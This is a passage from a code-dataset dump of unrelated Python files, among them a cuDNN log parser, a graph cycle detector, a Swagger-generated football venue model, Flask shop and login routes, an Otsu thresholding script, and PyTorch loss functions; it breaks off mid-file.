\"CUDNN_CONVOLUTION_BWD_FILTER_ALGO_WINOGRAD_NONFUSED\"]\n entries = dict()\n for ord_dict in ord_dict_list:\n arr_counts = np.array([itm[1] for _, itm in ord_dict.items()])\n indices = np.argsort(arr_counts)[::-1]\n keys = list(ord_dict.keys())\n print('Trace from training step=%d to step=%d' %(steps[0], steps[1]))\n print('CUDA FUNCTION, # CUDA CALLS, TENSORCORES USAGE')\n for ind in indices:\n algo_name = keys[ind]\n if algo_name in FWD_ALGO_TENSORCORE+BWD_ALGO_DATA_TENSORCORE+BWD_ALGO_FILTER_TENSORCORE:\n tensorcore_usage = \"YES\"\n else:\n tensorcore_usage = \"NO\"\n print('%s, %d ,%s ' %(algo_name, ord_dict[algo_name][1], tensorcore_usage))\n entries[algo_name]={'stats':ord_dict[algo_name][1], 
'tensor_core':tensorcore_usage}\n    print('\\n')\n    return entries\n\ndef get_step_timing(logfile):\n    step_1 = re.compile('step= 90')\n    step_2 = re.compile('step= 100')\n    times, steps = [], []\n    with open(logfile, mode='r') as f:\n        for line in f:\n            if step_1.search(line) or step_2.search(line):\n                stream = line.split(',')\n                time = stream[0].split('=')[-1]\n                step = stream[1].split('=')[-1]\n                times.append(float(time))\n                steps.append(int(step))\n    return times, steps\n\ndef get_lines_bounds(times, logfile):\n    pattern = re.compile('Time:')\n    lines = []\n    with open(logfile, mode='r') as f:\n        for i,line in enumerate(f):\n            if pattern.search(line):\n                stream=line\n                stream=line.split(' ')[-3]\n                time_list = re.findall('\\d+',stream)\n                total_time = int(time_list[0])*3600*24 + int(time_list[1])*3600 + int(time_list[2])*60 + int(time_list[3])\n                # BUGFIX: the original condition compared total_time with itself and so only\n                # checked the lower bound; keep lines whose timestamp lies between both steps.\n                if times[0] < total_time < times[1]: lines.append(i)\n    return lines[0], lines[-1]\n\n\ndef parse_cudnn_log(cudnn_logfile, train_logfile):  # param name fixed: the body refers to cudnn_logfile\n    # Dictionaries\n    FWD_ALGO = todict(FWD_ALGO_list)\n    BWD_DATA_ALGO = todict(BWD_ALGO_DATA_list)\n    BWD_FILTER_ALGO = todict(BWD_ALGO_FILTER_list)\n    MATH_OPS = todict(MATH_OPS_list)\n    ord_dict_list = [FWD_ALGO, BWD_DATA_ALGO, BWD_FILTER_ALGO, MATH_OPS]\n    # parsing\n    times, steps = get_step_timing(train_logfile)\n    line_lb, line_ub = get_lines_bounds(times, cudnn_logfile)\n    count_occurences(cudnn_logfile, [line_lb, line_ub], ord_dict_list, portion=0.75)\n    _ = rank_entries(ord_dict_list, steps)\n    #TODO: save dict as CSV or don't use dict.\n","repo_name":"nlaanait/stemdl","sub_path":"stemdl/ops.py","file_name":"ops.py","file_ext":"py","file_size_in_byte":19004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"6814353037","text":"from collections import deque\n\ndef detect_cycle(v0, u0, V, E):\n    visited = [False] * V\n    visited[v0] = True\n    predecessors = [None] * V\n\n    # The original used queue.Queue with enqueue/dequeue/empty, none of which exist on the\n    # standard-library class; a deque provides the intended FIFO behaviour.\n    queue = deque()\n    queue.append(v0)\n    while queue:\n        v = queue.popleft()\n        for u in E[v]:\n            if (v == v0 and u == u0):\n                continue\n            if (not visited[u]):\n                visited[u] = True\n                predecessors[u] = v\n\n                if (u == u0):\n                    res = [u0]\n                    while (predecessors[res[-1]] is not None):\n                        res.append(predecessors[res[-1]])\n                    res.append(u0)\n                    return res\n\n                queue.append(u)\n\n\n    return None\n\nV = 8\n\nE = [\n    [1, 4], # 0\n    [0, 3], # 1\n    [3, 6], # 2\n    [1, 2, 5], # 3\n    [0, 5, 7], # 4\n    [3, 4, 6, 7], # 5\n    [2, 5], # 6\n    [4, 5] # 7\n]\n\nP = detect_cycle(3, 1, V, E)\nprint(P)","repo_name":"mw-mff-uk/NTIN060","sub_path":"hw/hw3/hw3_1.py","file_name":"hw3_1.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"40646367190","text":"# coding: utf-8\n\n\"\"\"\n    College Football Data API\n\n    This is an API for accessing all sorts of college football data. Please note that API keys should be supplied with \\\"Bearer \\\" prepended (e.g. \\\"Bearer your_key\\\"). API keys can be acquired from the CollegeFootballData.com website. 
# noqa: E501\n\n OpenAPI spec version: 4.5.1\n Contact: admin@collegefootballdata.com\n Generated by: https://github.com/swagger-api/swagger-codegen.git\n\"\"\"\n\n\nimport pprint\nimport re # noqa: F401\n\nimport six\n\nfrom cfbd.configuration import Configuration\n\n\nclass Venue(object):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n swagger_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n swagger_types = {\n 'id': 'int',\n 'name': 'str',\n 'capacity': 'int',\n 'grass': 'bool',\n 'city': 'str',\n 'state': 'str',\n 'zip': 'str',\n 'country_code': 'str',\n 'location': 'VenueLocation',\n 'elevation': 'float',\n 'year_constructed': 'int',\n 'dome': 'bool',\n 'timezone': 'str'\n }\n\n attribute_map = {\n 'id': 'id',\n 'name': 'name',\n 'capacity': 'capacity',\n 'grass': 'grass',\n 'city': 'city',\n 'state': 'state',\n 'zip': 'zip',\n 'country_code': 'country_code',\n 'location': 'location',\n 'elevation': 'elevation',\n 'year_constructed': 'year_constructed',\n 'dome': 'dome',\n 'timezone': 'timezone'\n }\n\n def __init__(self, id=None, name=None, capacity=None, grass=None, city=None, state=None, zip=None, country_code=None, location=None, elevation=None, year_constructed=None, dome=None, timezone=None, _configuration=None): # noqa: E501\n \"\"\"Venue - a model defined in Swagger\"\"\" # noqa: E501\n if _configuration is None:\n _configuration = Configuration()\n self._configuration = _configuration\n\n self._id = None\n self._name = None\n self._capacity = None\n self._grass = None\n self._city = None\n self._state = None\n self._zip = None\n self._country_code = None\n self._location = None\n self._elevation = None\n self._year_constructed = None\n self._dome = None\n self._timezone = None\n self.discriminator = None\n\n if id is not None:\n self.id = id\n if name is not None:\n self.name = name\n if capacity is not None:\n self.capacity = capacity\n if grass is not None:\n self.grass = grass\n if city is not None:\n self.city = city\n if state is not None:\n self.state = state\n if zip is not None:\n self.zip = zip\n if country_code is not None:\n self.country_code = country_code\n if location is not None:\n self.location = location\n if elevation is not None:\n self.elevation = elevation\n if year_constructed is not None:\n self.year_constructed = year_constructed\n if dome is not None:\n self.dome = dome\n if timezone is not None:\n self.timezone = timezone\n\n @property\n def id(self):\n \"\"\"Gets the id of this Venue. # noqa: E501\n\n\n :return: The id of this Venue. # noqa: E501\n :rtype: int\n \"\"\"\n return self._id\n\n @id.setter\n def id(self, id):\n \"\"\"Sets the id of this Venue.\n\n\n :param id: The id of this Venue. # noqa: E501\n :type: int\n \"\"\"\n\n self._id = id\n\n @property\n def name(self):\n \"\"\"Gets the name of this Venue. # noqa: E501\n\n\n :return: The name of this Venue. # noqa: E501\n :rtype: str\n \"\"\"\n return self._name\n\n @name.setter\n def name(self, name):\n \"\"\"Sets the name of this Venue.\n\n\n :param name: The name of this Venue. # noqa: E501\n :type: str\n \"\"\"\n\n self._name = name\n\n @property\n def capacity(self):\n \"\"\"Gets the capacity of this Venue. # noqa: E501\n\n\n :return: The capacity of this Venue. 
# noqa: E501\n :rtype: int\n \"\"\"\n return self._capacity\n\n @capacity.setter\n def capacity(self, capacity):\n \"\"\"Sets the capacity of this Venue.\n\n\n :param capacity: The capacity of this Venue. # noqa: E501\n :type: int\n \"\"\"\n\n self._capacity = capacity\n\n @property\n def grass(self):\n \"\"\"Gets the grass of this Venue. # noqa: E501\n\n\n :return: The grass of this Venue. # noqa: E501\n :rtype: bool\n \"\"\"\n return self._grass\n\n @grass.setter\n def grass(self, grass):\n \"\"\"Sets the grass of this Venue.\n\n\n :param grass: The grass of this Venue. # noqa: E501\n :type: bool\n \"\"\"\n\n self._grass = grass\n\n @property\n def city(self):\n \"\"\"Gets the city of this Venue. # noqa: E501\n\n\n :return: The city of this Venue. # noqa: E501\n :rtype: str\n \"\"\"\n return self._city\n\n @city.setter\n def city(self, city):\n \"\"\"Sets the city of this Venue.\n\n\n :param city: The city of this Venue. # noqa: E501\n :type: str\n \"\"\"\n\n self._city = city\n\n @property\n def state(self):\n \"\"\"Gets the state of this Venue. # noqa: E501\n\n\n :return: The state of this Venue. # noqa: E501\n :rtype: str\n \"\"\"\n return self._state\n\n @state.setter\n def state(self, state):\n \"\"\"Sets the state of this Venue.\n\n\n :param state: The state of this Venue. # noqa: E501\n :type: str\n \"\"\"\n\n self._state = state\n\n @property\n def zip(self):\n \"\"\"Gets the zip of this Venue. # noqa: E501\n\n\n :return: The zip of this Venue. # noqa: E501\n :rtype: str\n \"\"\"\n return self._zip\n\n @zip.setter\n def zip(self, zip):\n \"\"\"Sets the zip of this Venue.\n\n\n :param zip: The zip of this Venue. # noqa: E501\n :type: str\n \"\"\"\n\n self._zip = zip\n\n @property\n def country_code(self):\n \"\"\"Gets the country_code of this Venue. # noqa: E501\n\n\n :return: The country_code of this Venue. # noqa: E501\n :rtype: str\n \"\"\"\n return self._country_code\n\n @country_code.setter\n def country_code(self, country_code):\n \"\"\"Sets the country_code of this Venue.\n\n\n :param country_code: The country_code of this Venue. # noqa: E501\n :type: str\n \"\"\"\n\n self._country_code = country_code\n\n @property\n def location(self):\n \"\"\"Gets the location of this Venue. # noqa: E501\n\n\n :return: The location of this Venue. # noqa: E501\n :rtype: VenueLocation\n \"\"\"\n return self._location\n\n @location.setter\n def location(self, location):\n \"\"\"Sets the location of this Venue.\n\n\n :param location: The location of this Venue. # noqa: E501\n :type: VenueLocation\n \"\"\"\n\n self._location = location\n\n @property\n def elevation(self):\n \"\"\"Gets the elevation of this Venue. # noqa: E501\n\n\n :return: The elevation of this Venue. # noqa: E501\n :rtype: float\n \"\"\"\n return self._elevation\n\n @elevation.setter\n def elevation(self, elevation):\n \"\"\"Sets the elevation of this Venue.\n\n\n :param elevation: The elevation of this Venue. # noqa: E501\n :type: float\n \"\"\"\n\n self._elevation = elevation\n\n @property\n def year_constructed(self):\n \"\"\"Gets the year_constructed of this Venue. # noqa: E501\n\n\n :return: The year_constructed of this Venue. # noqa: E501\n :rtype: int\n \"\"\"\n return self._year_constructed\n\n @year_constructed.setter\n def year_constructed(self, year_constructed):\n \"\"\"Sets the year_constructed of this Venue.\n\n\n :param year_constructed: The year_constructed of this Venue. 
# noqa: E501\n :type: int\n \"\"\"\n\n self._year_constructed = year_constructed\n\n @property\n def dome(self):\n \"\"\"Gets the dome of this Venue. # noqa: E501\n\n\n :return: The dome of this Venue. # noqa: E501\n :rtype: bool\n \"\"\"\n return self._dome\n\n @dome.setter\n def dome(self, dome):\n \"\"\"Sets the dome of this Venue.\n\n\n :param dome: The dome of this Venue. # noqa: E501\n :type: bool\n \"\"\"\n\n self._dome = dome\n\n @property\n def timezone(self):\n \"\"\"Gets the timezone of this Venue. # noqa: E501\n\n\n :return: The timezone of this Venue. # noqa: E501\n :rtype: str\n \"\"\"\n return self._timezone\n\n @timezone.setter\n def timezone(self, timezone):\n \"\"\"Sets the timezone of this Venue.\n\n\n :param timezone: The timezone of this Venue. # noqa: E501\n :type: str\n \"\"\"\n\n self._timezone = timezone\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.swagger_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n result[attr] = value\n if issubclass(Venue, dict):\n for key, value in self.items():\n result[key] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n return pprint.pformat(self.to_dict())\n\n def __repr__(self):\n \"\"\"For `print` and `pprint`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, Venue):\n return False\n\n return self.to_dict() == other.to_dict()\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n if not isinstance(other, Venue):\n return True\n\n return self.to_dict() != other.to_dict()\n","repo_name":"CFBD/cfbd-python","sub_path":"cfbd/models/venue.py","file_name":"venue.py","file_ext":"py","file_size_in_byte":10774,"program_lang":"python","lang":"en","doc_type":"code","stars":106,"dataset":"github-code","pt":"72"} +{"seq_id":"72878284393","text":"from flask import Blueprint, render_template, request, redirect, url_for, flash\r\nfrom flask_login import current_user, login_required\r\nfrom app.models import Items, Cart\r\nimport json\r\n\r\nshop = Blueprint('shop', __name__, template_folder='shop_templates')\r\n\r\n@shop.route('/shop')\r\ndef view_shop():\r\n products = Items.query.all() # Fetch all items\r\n # Create a DICT to itterate through in Jinja\r\n items = {}\r\n for item in products:\r\n items[item.id] = {}\r\n items[item.id]['name'] = item.item_name\r\n items[item.id]['icon'] = item.item_icon\r\n items[item.id]['description'] = item.item_description\r\n items[item.id]['price'] = item.item_price\r\n \r\n return render_template('shop.html', prods=items)\r\n\r\n@shop.route('/shop/cart/removeall')\r\n@login_required\r\ndef remove_all():\r\n cart = Cart.query.get(current_user.id)\r\n if cart:\r\n cart.delete_from_db()\r\n return redirect(url_for('shop.view_shop'))\r\n else:\r\n return redirect(url_for('shop.view_cart'))\r\n\r\n@shop.route('/shop/view/')\r\ndef view_product(id):\r\n product = Items.query.get(id)\r\n if product:\r\n return render_template('product.html', name=product.item_name, icon=product.item_icon, 
description=product.item_description, price=product.item_price, id=product.id)\r\n else:\r\n flash('That product was not found')\r\n return redirect(url_for('shop.view_shop'))\r\n \r\n@shop.route('/shop/cart/remove/')\r\n@login_required\r\ndef remove_from_cart(id):\r\n cart = Cart.query.get(current_user.id)\r\n if cart:\r\n cart_data = json.loads(cart.items)\r\n del cart_data[str(id)]\r\n cart.items = json.dumps(cart_data)\r\n cart.update_db()\r\n return redirect(url_for('shop.view_cart'))\r\n else:\r\n return redirect(url_for('shop.view_shop'))\r\n\r\n@shop.route('/shop/cart/add/', methods =['GET','POST'])\r\n@login_required\r\ndef add_to_cart(id):\r\n product = Items.query.get(id)\r\n cart = Cart.query.get(current_user.id)\r\n if product:\r\n if cart:\r\n cart_data = json.loads(cart.items)\r\n if str(product.id) in cart_data.keys():\r\n cart_data[str(product.id)]['quantity'] = cart_data[str(product.id)]['quantity'] + 1\r\n cart.items = json.dumps(cart_data)\r\n cart.update_db()\r\n return render_template('product.html', name=product.item_name, icon=product.item_icon, description=product.item_description, price=product.item_price, id=product.id)\r\n else:\r\n cart_data[product.id] = {}\r\n cart_data[product.id]['name'] = product.item_name\r\n cart_data[product.id]['icon'] = product.item_icon\r\n cart_data[product.id]['description'] = product.item_description\r\n cart_data[product.id]['price'] = product.item_price\r\n cart_data[product.id]['quantity'] = 1\r\n cart.items = json.dumps(cart_data)\r\n cart.update_db()\r\n return render_template('product.html', name=product.item_name, icon=product.item_icon, description=product.item_description, price=product.item_price, id=product.id)\r\n else:\r\n cart_data = {}\r\n cart_data[product.id] = {}\r\n cart_data[product.id][\"name\"] = product.item_name\r\n cart_data[product.id][\"icon\"] = product.item_icon\r\n cart_data[product.id][\"description\"] = product.item_description\r\n cart_data[product.id]['price'] = product.item_price\r\n cart_data[product.id]['quantity'] = 1\r\n d = Cart(current_user.id, json.dumps(cart_data))\r\n d.save_to_db()\r\n return render_template('product.html', name=product.item_name, icon=product.item_icon, description=product.item_description, price=product.item_price, id=product.id)\r\n else:\r\n flash('That product was not found')\r\n return redirect(url_for('shop.view_shop'))\r\n\r\n\r\n@shop.route('/shop/cart/', methods =['GET','POST'])\r\n@login_required\r\ndef view_cart():\r\n items = Cart.query.get(current_user.id) # Fetch all items\r\n # Create a DICT to itterate through in Jinja\r\n cart = json.loads(items.items)\r\n if items:\r\n total = 0 #: Float\r\n items = 0 #: Int\r\n for key, value in cart.items():\r\n total += value['price']\r\n items += 1\r\n \r\n return render_template('Checkout.html', cart=cart, total=round(total, 2), items=items)\r\n else:\r\n return redirect(url_for('shop.view_shop'))\r\n","repo_name":"Anglindw/group_project-flask","sub_path":"app/shop/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":4564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70048784232","text":"\"\"\"\nSolicitar el ingreso de una clave por teclado y almacenarla en una cadena de\ncaracteres. 
Controlar que el string ingresado tenga entre 10 y 20 caracteres para\nque sea válido, en caso contrario mostrar un mensaje de error.\n\"\"\"\n\narray = []\n\nclave = input(\"ingresa una clave\")\nif len(clave) <10 or len(clave) >20:\n print(\"ingresa una clave correcta\")\nelse:\n array.append(clave)\n print(\"La clave se guardo exitosamente\")\n print(array)\n\n\n","repo_name":"Gestrial/Ejercicios-Python","sub_path":"Ejercicio12.py","file_name":"Ejercicio12.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"39549985052","text":"from flask_app import app\nfrom flask import render_template, redirect, request, session\nfrom flask_app.models.user import User\n\n@app.route(\"/\")\ndef home():\n return render_template(\"index.html\")\n\n@app.route(\"/register\", methods=['POST'])\ndef register():\n if not User.validate_user(request.form):\n return redirect(\"/\")\n \n user_in = User.create_user(request.form)\n one_user= User.one_user(user_in)\n session['user_id'] = one_user.id\n print(\"___USER IN VAR___\",user_in)\n print(\"___One USER IN VAR___\", one_user)\n return redirect(\"/dashboard\")\n\n\n@app.route(\"/login\", methods=['POST'])\ndef login():\n user_in_db = User.validate_login(request.form)\n\n if not user_in_db:\n return redirect(\"/\")\n\n print(\"___THIS USER LOGIN___\",user_in_db) \n\n user = User.select_by_email(request.form)\n print(\"___THIS USER ID___\", user.id)\n session['user_id'] = user.id\n\n return redirect(\"/dashboard\")\n\n\n@app.route(\"/dashboard\")\ndef dashboard():\n if not \"user_id\" in session:\n return redirect(\"/\")\n \n user_id = {\n \"id\":session['user_id']\n }\n\n user = User.one_user(user_id) \n return render_template(\"/dashboard.html\", user=user)\n\n \n@app.route(\"/logout\")\ndef logout():\n session.pop(\"user_id\", None)\n return redirect(\"/\")","repo_name":"alexpablo-code/login_and_registration","sub_path":"flask_app/controllers/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":1301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38515217374","text":"import cv2\nimport numpy as np\n\ndef gray(img):\n img[:, :, 0] *= 0.0722 #B\n img[:, :, 1] *= 0.7152 #G\n img[:, :, 2] *= 0.2126 #R\n img2 = np.sum(img, axis=2).astype(np.uint8)\n return img2\n\ndef oo2tika(img):\n max_sigma = 0\n max_i = 0\n H,W = img.shape\n for i in range(1, 256):\n v0 = img[np.where(img < i)]\n w0 = len(v0)/(H*W)\n m0 = np.mean(v0) if w0 > 0 else 0.\n \n v1 = img[np.where(img >= i)] \n w1 = len(v1)/(H*W)\n m1 = np.mean(v1) if w1 > 0 else 0.\n \n sigma = w0 * w1 * ((m0 - m1)**2)\n\n if sigma > max_sigma:\n max_i = i\n max_sigma = sigma\n\n return max_i\n\n\nimg = cv2.imread('imori.jpg').astype(np.float32)\nimg2 = gray(img)\n\nth = oo2tika(img2)\nprint(th)\n\nimg3 = np.where(img2 < th, 0, 255)\ncv2.imwrite(\"out_figure4.jpg\",img3)\n","repo_name":"hirokichi-k/IM_100","sub_path":"IM1-10/4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"13426685082","text":"from django.urls import path, include\nfrom rest_framework import routers\nfrom .views import PostView\n\napp_name = \"publications\"\n\nROUTER = routers.SimpleRouter()\nROUTER.register(\"post\", PostView, \"post\")\n\nurlpatterns = [\n path(\"\", include(ROUTER.urls)),\n]\nurlpatterns += 
ROUTER.urls\n","repo_name":"Bekbolsunn/Instagram-Api","sub_path":"publications/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26559531388","text":"from __future__ import division\nimport torch\nimport torch.nn as nn\nimport torch.sparse\nfrom torch.autograd import Variable\nimport numpy as np\nimport sys\nfrom torch.autograd import Function\nimport math\nfrom scipy import misc \nimport scipy\nimport functools\nfrom torch.nn import init\nfrom torch.optim import lr_scheduler\n\n###############################################################################\n# Functions\n###############################################################################\nVERSION = 4\nEPSILON = 1e-8\n\n\ndef decompose_rotation(R):\n roll = math.atan2(R[2,1], R[2,2]); \n pitch = math.atan2(-R[2,0], math.sqrt(R[2,1]*R[2,1] + R[2,2]*R[2,2])); \n yaw = math.atan2(R[1,0], R[0,0]); \n return [roll,pitch,yaw]\n\ndef decompose_up_n(up_n):\n pitch = - math.asin(up_n[0])\n\n sin_roll = up_n[1]/math.cos(pitch)\n\n roll = math.asin(sin_roll)\n return roll, pitch\n\n\ndef compose_rotation(x, y, z):\n X = np.identity(3); \n Y = np.identity(3); \n Z = np.identity(3); \n\n X[1,1] = math.cos(x)\n X[1,2] = -math.sin(x)\n X[2,1] = math.sin(x)\n X[2,2] = math.cos(x)\n\n Y[0,0] = math.cos(y)\n Y[0,2] = math.sin(y)\n Y[2,0] = -math.sin(y)\n Y[2,2] = math.cos(y)\n\n Z[0,0] = math.cos(z)\n Z[0,1] = -math.sin(z)\n Z[1,0] = math.sin(z)\n Z[1,1] = math.cos(z)\n\n # R = np.dot(Z, np.dot(Y, X))\n\n R = np.matmul(np.matmul(Z,Y),X)\n return R\n\ndef get_scheduler(optimizer, opt):\n if opt.lr_policy == 'lambda':\n def lambda_rule(epoch):\n lr_l = 1.0 - max(0, epoch + 1 + opt.epoch_count - opt.niter) / float(opt.niter_decay + 1)\n return lr_l\n scheduler = lr_scheduler.LambdaLR(optimizer, lr_lambda=lambda_rule)\n elif opt.lr_policy == 'step':\n scheduler = lr_scheduler.StepLR(optimizer, step_size=opt.lr_decay_epoch, gamma=0.5)\n elif opt.lr_policy == 'plateau':\n scheduler = lr_scheduler.ReduceLROnPlateau(optimizer, mode='min', factor=0.2, threshold=0.01, patience=5)\n else:\n return NotImplementedError('learning rate policy [%s] is not implemented', opt.lr_policy)\n return scheduler\n\n\ndef get_norm_layer(norm_type='instance'):\n if norm_type == 'batch':\n norm_layer = functools.partial(nn.BatchNorm2d, affine=True)\n elif norm_type == 'instance':\n norm_layer = functools.partial(nn.InstanceNorm2d, affine=False, track_running_stats=True)\n elif norm_type == 'none':\n norm_layer = None\n else:\n raise NotImplementedError('normalization layer [%s] is not found' % norm_type)\n return norm_layer\n\ndef print_network(net_):\n num_params = 0\n for param in net_.parameters():\n num_params += param.numel()\n #print(net_)\n #print('Total number of parameters: %d' % num_params)\n\n\n##############################################################################\n# Classes\n##############################################################################\n\nclass ExtractSMinEigenValue(Function):\n @staticmethod\n def forward(ctx, input):\n D, VL, VR = scipy.linalg.eig(input.detach().cpu().numpy(), left=True, right=True)\n\n real_idx = np.abs(D.imag) < EPSILON\n\n vl= VL[:, real_idx]\n vr = VR[:, real_idx]\n lambda_real = D[real_idx].real\n\n min_idx = np.argmin(lambda_real)\n min_lambda = lambda_real[min_idx] \n mim_vl = vl[:, min_idx].real\n min_vr = vr[:, min_idx].real\n\n # normalize vl so that vl'*vr = I\n sum_vlvr = 
np.dot(mim_vl, min_vr)\n mim_vl = mim_vl/sum_vlvr\n\n ctx.save_for_backward(input, \n torch.as_tensor(mim_vl, \n dtype=input.dtype, \n device=torch.device('cuda')), \n torch.as_tensor(min_vr, \n dtype=input.dtype, \n device=torch.device('cuda')))\n \n\n return torch.as_tensor(min_lambda, dtype=input.dtype, device=torch.device('cuda'))\n\n @staticmethod\n def backward(ctx, grad_output):\n input, mim_vl, min_vr = ctx.saved_tensors\n grad_weight = None\n grad_input = grad_output * torch.ger(mim_vl, min_vr)\n\n return grad_input, grad_weight\n\n\nclass JointLoss(nn.Module):\n def __init__(self, opt):\n super(JointLoss, self).__init__()\n self.opt = opt\n self.num_scales = 5\n\n self.total_loss = None\n\n def compute_cos_sim_loss(self, gt_n, pred_n, mask):\n cos_criterion= nn.CosineSimilarity(dim=1)\n num_valid_pixels = torch.sum(mask) + EPSILON\n\n cos_term = cos_criterion(gt_n, pred_n)\n\n n_term = torch.sum(mask * (1.0 - cos_term))/num_valid_pixels\n return n_term\n\n def compute_angle_error(self, pred_cam_geo_unit, \n pred_up_geo_unit, pred_weights, \n targets, stack_error=False):\n\n gt_up_vector = targets['gt_up_vector'].cuda()\n\n cos_criterion = nn.CosineSimilarity(dim=0)\n\n num_pixels = pred_cam_geo_unit.size(2) * pred_cam_geo_unit.size(3)\n num_samples = pred_cam_geo_unit.size(0)\n\n identity_mat = torch.eye(3).float().cuda()\n identity_mat_rep = identity_mat.unsqueeze(0).repeat(num_samples,1,1)#, requires_grad=False)\n # zeros_mat = Variable(torch.zeros(3).float().cuda(), requires_grad=False)\n\n weights_n = pred_weights[:, 0:1, :, :].repeat(1,3,1,1)\n weights_u = pred_weights[:, 1:2, :, :].repeat(1,3,1,1)\n weights_t = pred_weights[:, 2:3, :, :].repeat(1,3,1,1)\n\n pred_cam_n = pred_cam_geo_unit[:, 0:3, :, :] \n pred_cam_u = pred_cam_geo_unit[:, 3:6, :, :]\n pred_cam_t = pred_cam_geo_unit[:, 6:9, :, :]\n\n pred_cam_n_w = pred_cam_n * weights_n\n pred_cam_u_w = pred_cam_u * weights_u\n pred_cam_t_w = pred_cam_t * weights_t\n\n pred_cam_n_w_flat = pred_cam_n_w.view(num_samples, \n pred_cam_n_w.size(1), \n num_pixels)\n pred_cam_u_w_flat = pred_cam_u_w.view(num_samples, \n pred_cam_u_w.size(1), \n num_pixels)\n pred_cam_t_w_flat = pred_cam_t_w.view(num_samples, \n pred_cam_t_w.size(1), \n num_pixels)\n\n # M * 3 x 3N matrix\n A_w = torch.cat((pred_cam_n_w_flat, pred_cam_u_w_flat, pred_cam_t_w_flat), dim=2)\n \n pred_up_geo_unit_w = pred_weights * pred_up_geo_unit\n pred_up_geo_unit_w_flat = pred_up_geo_unit_w.view(num_samples, pred_up_geo_unit.size(1), num_pixels)\n # M * 1 * 3N\n b_w = torch.cat((pred_up_geo_unit_w_flat[:, 0:1, :], pred_up_geo_unit_w_flat[:, 1:2, :], pred_up_geo_unit_w_flat[:, 2:3, :]), dim=2)\n\n # M*3*3\n H = torch.bmm(A_w, torch.transpose(A_w, 1, 2))\n # M*3*1\n g = torch.bmm(A_w, torch.transpose(b_w, 1, 2))\n ggT = torch.bmm(g, torch.transpose(g, 1, 2))\n\n # C_mat = torch.cat( (torch.cat((-A1, -A0), dim=2), torch.cat((identity_mat, zeros_mat), dim=2)), dim=1)\n C_mat = torch.cat( (torch.cat((H, -identity_mat_rep), dim=2), torch.cat((-ggT, H), dim=2)), dim=1)\n\n if stack_error:\n total_rot_error = []\n total_roll_error = []\n total_pitch_error = []\n else:\n total_rot_error = 0.0\n total_roll_error = 0.0\n total_pitch_error = 0.0\n\n for i in range(num_samples):\n est_lambda = torch.eig(C_mat[i, :, :])\n est_lambda = est_lambda[0]\n\n img_part = est_lambda[:, 1]\n real_part = est_lambda[:, 0]\n\n min_lambda = torch.min(real_part[torch.abs(img_part.data) < 1e-6])\n\n est_up_n = torch.matmul(torch.pinverse(H[i, :, :] - min_lambda * identity_mat), g[i, :, :])\n 
est_up_n_norm = torch.sqrt( torch.sum(est_up_n**2) )\n est_up_n = est_up_n[:, 0]/est_up_n_norm\n\n up_diff_cos = cos_criterion(est_up_n, gt_up_vector[i, :])\n\n [pred_roll, pred_pitch] = decompose_up_n(est_up_n.cpu().numpy()) \n [gt_roll, gt_pitch] = decompose_up_n(gt_up_vector[i, :].cpu().numpy()) \n\n\n if stack_error:\n total_rot_error += [np.arccos(np.clip(up_diff_cos.item(), -1.0, 1.0)) * 180.0/math.pi]\n total_roll_error += [abs(pred_roll - gt_roll)*180.0/math.pi]\n total_pitch_error += [abs(pred_pitch - gt_pitch)*180.0/math.pi]\n else:\n total_rot_error += np.arccos(np.clip(up_diff_cos.item(), -1.0, 1.0)) * 180.0/math.pi\n total_roll_error += abs(pred_roll - gt_roll)*180.0/math.pi\n total_pitch_error += abs(pred_pitch - gt_pitch)*180.0/math.pi\n\n return total_rot_error, total_roll_error, total_pitch_error\n\n def compute_normal_gradient_loss(self, gt_n_unit, pred_n_unit, mask):\n n_diff = pred_n_unit - gt_n_unit\n mask_rep = mask.unsqueeze(1).repeat(1, gt_n_unit.size(1), 1, 1)\n # vertical gradient\n v_gradient = torch.abs(n_diff[:, :, :-2,:] - n_diff[:, :, 2:,:])\n v_mask = torch.mul(mask_rep[:, :, :-2,:], mask_rep[:, :, 2:,:])\n v_gradient = torch.mul(v_gradient, v_mask)\n # horizontal gradient\n h_gradient = torch.abs(n_diff[:, :, :, :-2] - n_diff[:, :, :, 2:])\n h_mask = torch.mul(mask_rep[:, :, :, :-2], mask_rep[:, :, :, 2:])\n h_gradient = torch.mul(h_gradient, h_mask)\n\n N = torch.sum(h_mask) + torch.sum(v_mask) + EPSILON\n gradient_loss = torch.sum(h_gradient) + torch.sum(v_gradient)\n gradient_loss = gradient_loss/(N)\n return gradient_loss\n\n def normalize_normal(self, normals):\n normals_norm = torch.sqrt( torch.sum(torch.pow(normals , 2) 